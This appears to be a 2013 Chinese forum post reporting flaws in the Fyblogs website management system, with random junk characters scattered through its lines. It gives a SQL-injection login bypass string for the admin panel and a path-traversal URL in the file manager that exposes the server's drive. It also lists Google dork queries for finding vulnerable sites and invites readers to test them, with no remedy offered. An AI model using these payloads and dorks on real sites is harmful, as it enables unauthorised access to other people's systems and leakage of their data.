漏洞类型: 未授权访问/权限绕过9 }$ E% g1 x& w
" \; c0 }1 H; l- |7 x简要描述:$ q& F) ?$ X6 d
( s$ O1 X+ I0 EFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
^# Z& O4 ~# h, ?7 T, o9 a h' w
* W3 c% m& ~/ {* p* Q! Q详细说明:
2 S! ^& h& S1 B- P# ~& |
) G7 U9 r! {# P7 q* c后台万能密码 'or'='or'& v! n- _6 o/ _( s( K
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
/ I7 y" ^: ^# C. u% a0 \7 Qadmin/uploadfile.asp?currentFolder=/upfiles/../
$ m: j1 A" z2 q
' x, H" Y* d0 T% Q漏洞证明:
& X0 Q# h% C$ _# z/ R% q4 `7 ]; h; n" f3 }/ S+ K
谷歌:inurl:type.asp?id=1 新闻中心
8 c. F5 R9 ?/ |& G- G或者 :inurl:download_ok.asp?- E( V x" i v% t, y7 x
( ` i/ K" M" z4 u
可以测试0 Z( E- ]" O7 D! m0 o+ B2 }' Q" _
) x6 o$ G) U0 T8 q1 F- Q' D* T
7 T) ^+ M! m+ Y4 ?( b4 b, L
|
发表于 2013-3-7 13:07:46
收藏
支持
反对